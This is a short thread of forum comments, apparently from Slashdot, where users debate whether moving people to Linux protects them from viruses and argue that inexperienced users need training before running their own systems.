Re:*nix and Viruses (Score:2)
No, not at all. It just means that you shouldn't expect moving them to Linux will wave a magic wand and keep them safe from all harm.
Or at least until they've had you/me/someone else clueful, giving them a good training course? (I'm tempted to add 'with a cattle prod' but shall refrain... erm, oops :) :+)
Wristbands, and feedback software that jolts them every time they Luse
--
Re:Security Philosophy is Paramount (Score:2)
Well, duh, I don't.
I want to learn Linux, but because of the great wisdom of Abigail, I shouldn't install it, I should get experience as a user.
I dunno. Do you think the best way to learn how to fly is to buy a plane and just take off? Or would you start with making yourself more familiar with flying planes under the supervision of someone who knows how to fly?
-- Abigail
Re:Security Philosophy is Paramount (Score:2)
Screwing up gives Linux and Unix a bad name, people not knowing what they do flood IRC and Usenet channels with noise, and they give script kiddies many opportunities.
-- Abigail